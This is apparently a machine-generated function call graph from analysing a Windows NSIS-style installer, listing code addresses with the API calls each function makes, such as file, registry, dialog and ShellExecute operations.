2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 